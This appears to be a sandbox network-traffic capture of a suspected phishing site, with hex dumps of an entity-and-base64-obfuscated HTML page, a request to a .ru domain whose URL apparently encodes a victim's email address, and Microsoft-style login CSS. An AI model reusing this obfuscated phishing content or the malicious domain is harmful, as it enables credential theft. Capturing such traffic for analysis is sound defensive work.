                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 23 35 30 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 37 38 3b 26 23 31 30 38 3b 26 23 37 36 3b 26 23 38 38 3b 26 23 31 30 30 3b 26 23 31 31 32 3b 26 23 39 30 3b 26 23 37 32 3b 26 23 38 32 3b 26 23 31 31 31 3b 26 23 37 36 3b 26 23 36 37 3b 26 23 36 36 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 37 30 3b 26 23 31 31 35 3b 26 23 37 36 3b 26 23 38 38 3b 26 23 37 38 3b 26 23 31 30 36 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 31 32 30 3b 26 23 31 30 38 3b 26 23 38 30 3b 26 23 38 34 3b 26 23 36 39 3b 26 23 31 30 35 3b 26 23 38 30 3b 26 23 31 30 36 3b 26 23 31 32 30 3b 26 23 34 38 3b 26 23 39 37 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 31 31 35 3b 26 23 39 30 3b 26 23 38 34 3b 26 23 35 32 3b 26
                                                                                                                                                              Data Ascii: #50;&#97;&#87;&#78;&#108;&#76;&#88;&#100;&#112;&#90;&#72;&#82;&#111;&#76;&#67;&#66;&#112;&#98;&#109;&#108;&#48;&#97;&#87;&#70;&#115;&#76;&#88;&#78;&#106;&#89;&#87;&#120;&#108;&#80;&#84;&#69;&#105;&#80;&#106;&#120;&#48;&#97;&#88;&#82;&#115;&#90;&#84;&#52;&
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 31 31 3b 26 23 38 34 3b 26 23 31 32 32 3b 26 23 38 32 3b 26 23 34 38 3b 26 23 31 30 31 3b 26 23 37 30 3b 26 23 31 30 38 3b 26 23 31 31 38 3b 26 23 38 32 3b 26 23 38 35 3b 26 23 31 30 37 3b 26 23 35 30 3b 26 23 39 30 3b 26 23 38 36 3b 26 23 38 36 3b 26 23 31 30 37 3b 26 23 37 33 3b 26 23 31 30 36 3b 26 23 35 32 3b 26 23 35 36 3b 26 23 37 36 3b 26 23 35 31 3b 26 23 37 38 3b 26 23 31 30 36 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 31 31 39 3b 26 23 31 30 30 3b 26 23 36 38 3b 26 23 35 32 3b 26 23 35 36 3b 26 23 39 39 3b 26 23 35 31 3b 26 23 38 32 3b 26 23 35 33 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 38 35 3b 26 23 34 33 3b 26 23 37 33 3b 26 23 35 30 3b 26 23 39 30 3b 26 23 31 31 38 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 38 32 3b 26 23 31 30
                                                                                                                                                              Data Ascii: 11;&#84;&#122;&#82;&#48;&#101;&#70;&#108;&#118;&#82;&#85;&#107;&#50;&#90;&#86;&#86;&#107;&#73;&#106;&#52;&#56;&#76;&#51;&#78;&#106;&#99;&#109;&#108;&#119;&#100;&#68;&#52;&#56;&#99;&#51;&#82;&#53;&#98;&#71;&#85;&#43;&#73;&#50;&#90;&#118;&#98;&#51;&#82;&#10
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 3b 26 23 31 30 34 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 31 36 3b 26 23 31 31 30 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 35 37 3b 26 23 34 39 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 38 31 3b 26 23 31 31 36 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 32 30 3b 26 23 31 31 32 3b 26 23 39 39 3b 26 23 36 38 3b 26 23 31 31 32 3b 26 23 31 31 39 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 38 32 3b 26 23 31 30 37 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 31 30 3b 26 23 37 36 3b 26 23 38 37 3b 26 23 37 34 3b 26 23 31 31 38 3b 26 23 31 30 31 3b 26 23 36 38 3b 26 23 31 31 36 3b 26 23 34 38 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 37 36 3b 26 23 38 37 3b 26 23 37 30 3b 26 23 31 31 35 3b 26 23 39 37 3b 26 23 38 37 3b 26 23
                                                                                                                                                              Data Ascii: ;&#104;&#89;&#50;&#116;&#110;&#99;&#109;&#57;&#49;&#98;&#109;&#81;&#116;&#89;&#50;&#120;&#112;&#99;&#68;&#112;&#119;&#89;&#87;&#82;&#107;&#97;&#87;&#53;&#110;&#76;&#87;&#74;&#118;&#101;&#68;&#116;&#48;&#90;&#88;&#104;&#48;&#76;&#87;&#70;&#115;&#97;&#87;&#
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 37 30 3b 26 23 31 30 36 3b 26 23 39 30 3b 26 23 38 34 3b 26 23 31 31 32 3b 26 23 31 31 37 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 31 30 30 3b 26 23 31 32 31 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 36 35 3b 26 23 35 35 3b 26 23 39 30 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 37 31 3b 26 23 31 32 30 3b 26 23 31 30 34 3b 26 23 31 30 31 3b 26 23 38 34 3b 26 23 31 31 32 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 31 32 30 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 38 35 3b 26 23 31 31 36 3b 26 23 38 39 3b 26 23 31 30 39 3b 26 23 31 32 30 3b 26 23 31 31 38 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 31 35 3b 26 23 35 35 3b 26 23 39 30 3b 26 23 31 30 39 3b 26 23 31 32 30 3b 26 23 31 31 38 3b 26 23 38
                                                                                                                                                              Data Ascii: 70;&#106;&#90;&#84;&#112;&#117;&#98;&#51;&#100;&#121;&#89;&#88;&#65;&#55;&#90;&#71;&#108;&#122;&#99;&#71;&#120;&#104;&#101;&#84;&#112;&#112;&#98;&#109;&#120;&#112;&#98;&#109;&#85;&#116;&#89;&#109;&#120;&#118;&#89;&#50;&#115;&#55;&#90;&#109;&#120;&#118;&#8
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 35 37 3b 26 23 31 31 37 3b 26 23 37 39 3b 26 23 31 30 35 3b 26 23 35 32 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 31 32 31 3b 26 23 36 36 3b 26 23 31 30 38 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 37 38 3b 26 23 31 30 38 3b 26 23 37 36 3b 26 23 38 37 3b 26 23 35 37 3b 26 23 34 39 3b 26 23 31 30 30 3b 26 23 37 32 3b 26 23 34 38 3b 26 23 31 31 37 3b 26 23 38 39 3b 26 23 31 31 30 3b 26 23 38 36 3b 26 23 34 38 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 31 37 3b 26 23 37 39 3b 26 23 31 30 39 3b 26 23 31 30 34 3b 26 23 31 31 38 3b 26 23 31 30 30 3b 26 23 31 30 39 3b 26 23 38 36 3b 26 23 31 32 31 3b 26 23 31 30 31 3b 26 23 35 30 3b 26 23 37 34 3b 26 23 31 30 34 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 31 36
                                                                                                                                                              Data Ascii: ;&#97;&#87;&#57;&#117;&#79;&#105;&#52;&#122;&#99;&#121;&#66;&#108;&#89;&#88;&#78;&#108;&#76;&#87;&#57;&#49;&#100;&#72;&#48;&#117;&#89;&#110;&#86;&#48;&#100;&#71;&#57;&#117;&#79;&#109;&#104;&#118;&#100;&#109;&#86;&#121;&#101;&#50;&#74;&#104;&#89;&#50;&#116
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 26 23 38 35 3b 26 23 35 35 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 36 36 3b 26 23 31 30 34 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 31 30 31 3b 26 23 38 34 3b 26 23 31 31 31 3b 26 23 31 32 30 3b 26 23 31 30 32 3b 26 23 38 33 3b 26 23 35 33 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 36 36 3b 26 23 34 39 3b 26 23 39 39 3b 26 23 37 32 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 37 34 3b 26 23 31 31 30 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 35 32 3b 26 23 35 34 3b 26 23 37 38 3b 26 23 31 32 32 3b 26 23 36 36 3b 26 23 31 31 39 3b 26 23 31 30 31 3b 26 23 36 37 3b 26 23 36 36 3b 26 23 31 30 34 3b 26 23 31 30 30 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 31 31 38 3b 26 23 37 39 3b 26 23 35 31
                                                                                                                                                              Data Ascii: &#85;&#55;&#98;&#51;&#66;&#104;&#89;&#50;&#108;&#48;&#101;&#84;&#111;&#120;&#102;&#83;&#53;&#119;&#98;&#51;&#66;&#49;&#99;&#72;&#116;&#116;&#89;&#88;&#74;&#110;&#97;&#87;&#52;&#54;&#78;&#122;&#66;&#119;&#101;&#67;&#66;&#104;&#100;&#88;&#82;&#118;&#79;&#51
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 30 39 3b 26 23 31 30 38 3b 26 23 31 30 34 3b 26 23 39 38 3b 26 23 36 37 3b 26 23 31 32 30 3b 26 23 31 32 32 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 32 32 3b 26 23 37 36 3b 26 23 38 38 3b 26 23 37 38 3b 26 23 31 30 38 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 38 33 3b 26 23 35 33 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 36 36 3b 26 23 34 39 3b 26 23 39 39 3b 26 23 36 37 3b 26 23 36 35 3b 26 23 31 31 37 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 32 30 3b 26 23 31 31 38 3b 26 23 39 39 3b 26 23 35 30 3b 26 23 38 36 3b 26 23 35 35 3b 26 23 39 39 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 32 32 3b 26 23 39 37 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 31 31 32 3b 26 23 39 38 3b 26
                                                                                                                                                              Data Ascii: 09;&#108;&#104;&#98;&#67;&#120;&#122;&#89;&#87;&#53;&#122;&#76;&#88;&#78;&#108;&#99;&#109;&#108;&#109;&#102;&#83;&#53;&#119;&#98;&#51;&#66;&#49;&#99;&#67;&#65;&#117;&#89;&#50;&#120;&#118;&#99;&#50;&#86;&#55;&#99;&#71;&#57;&#122;&#97;&#88;&#82;&#112;&#98;&
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 23 38 37 3b 26 23 35 33 3b 26 23 34 38 3b 26 23 31 30 31 3b 26 23 35 30 3b 26 23 34 39 3b 26 23 31 30 34 3b 26 23 31 30 31 3b 26 23 36 37 3b 26 23 34 39 3b 26 23 31 31 31 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 31 30 38 3b 26 23 31 31 30 3b 26 23 39 37 3b 26 23 37 32 3b 26 23 38 31 3b 26 23 35 34 3b 26 23 37 37 3b 26 23 31 32 32 3b 26 23 36 35 3b 26 23 31 30 38 3b 26 23 37 39 3b 26 23 35 30 3b 26 23 35 37 3b 26 23 35 30 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 37 34 3b 26 23 31 30 39 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 35 31 3b 26 23 37 39 3b 26 23 31 30 39 3b 26 23 37 30 3b 26 23 34 39 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 38 31 3b 26 23 37 31 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 39 30 3b 26 23 37 31
                                                                                                                                                              Data Ascii: #87;&#53;&#48;&#101;&#50;&#49;&#104;&#101;&#67;&#49;&#111;&#90;&#87;&#108;&#110;&#97;&#72;&#81;&#54;&#77;&#122;&#65;&#108;&#79;&#50;&#57;&#50;&#90;&#88;&#74;&#109;&#98;&#71;&#57;&#51;&#79;&#109;&#70;&#49;&#100;&#71;&#57;&#57;&#81;&#71;&#49;&#108;&#90;&#71
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 23 35 30 3b 26 23 31 31 35 3b 26 23 35 35 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 37 30 3b 26 23 31 32 31 3b 26 23 39 30 3b 26 23 35 30 3b 26 23 31 30 38 3b 26 23 31 31 37 3b 26 23 37 36 3b 26 23 38 37 3b 26 23 31 32 30 3b 26 23 31 30 38 3b 26 23 39 30 3b 26 23 31 31 30 3b 26 23 38 31 3b 26 23 35 34 3b 26 23 37 33 3b 26 23 36 38 3b 26 23 38 36 3b 26 23 31 31 39 3b 26 23 31 30 31 3b 26 23 36 38 3b 26 23 31 31 36 3b 26 23 35 37 3b 26 23 38 30 3b 26 23 36 37 3b 26 23 35 37 3b 26 23 31 32 32 3b 26 23 31 30 30 3b 26 23 37 32 3b 26 23 31 30 38 3b 26 23 31 31 35 3b 26 23 39 30 3b 26 23 38 34 3b 26 23 35 32 3b 26 23 35 36 3b 26 23 37 36 3b 26 23 35 30 3b 26 23 31 30 34 3b 26 23 31 30 38 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 38 31 3b 26 23 34 33 3b 26 23 38 30 3b
                                                                                                                                                              Data Ascii: #50;&#115;&#55;&#98;&#87;&#70;&#121;&#90;&#50;&#108;&#117;&#76;&#87;&#120;&#108;&#90;&#110;&#81;&#54;&#73;&#68;&#86;&#119;&#101;&#68;&#116;&#57;&#80;&#67;&#57;&#122;&#100;&#72;&#108;&#115;&#90;&#84;&#52;&#56;&#76;&#50;&#104;&#108;&#89;&#87;&#81;&#43;&#80;


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              41192.168.2.449802172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:32 UTC750OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6YvderOtk6O0M7sgzYT/1TKDqCvavBzEg6KKXO HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:32 UTC709INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:32 GMT
                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xoMvZlJbHIGwiLIVHBp9z7imYFXjin2Y0qxaBcFcQmFJPGlIKwNwZoL5MVh4XNwzm%2F1%2FkosJ%2B3MJ8blDol8P6HbQ49jiY8xbA92BzEuGH4chs%2B25mg9CmN1NEN00XI4iYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ecd92143be-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:32 UTC660INData Raw: 37 63 65 63 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                                                                                                                              Data Ascii: 7cechtml{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 62 75 74 74 6f 6e 2c 69 6e 70
                                                                                                                                                              Data Ascii: }sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,inp
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3b 6f 75 74 6c 69
                                                                                                                                                              Data Ascii: before,:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outli
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 30 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 7b 63 6f 6c 6f 72 3a 23 63 63 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a
                                                                                                                                                              Data Ascii: 000;background-color:#fff}a{color:#ccc;text-decoration:none}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 32 37 31 36 70 78 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32
                                                                                                                                                              Data Ascii: adding-top:2.2716px}.text-headline.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:2
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 37 2e 38 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                              Data Ascii: 624px;max-height:7.89765rem}.text-subheader.text-maxlines-4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e
                                                                                                                                                              Data Ascii: ext-caption.text-maxlines-1,h5.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 74 3a 31 2e 39 33 31 38 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c
                                                                                                                                                              Data Ascii: t:1.9318rem}.text-subcaption.text-maxlines-4{max-height:40.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,
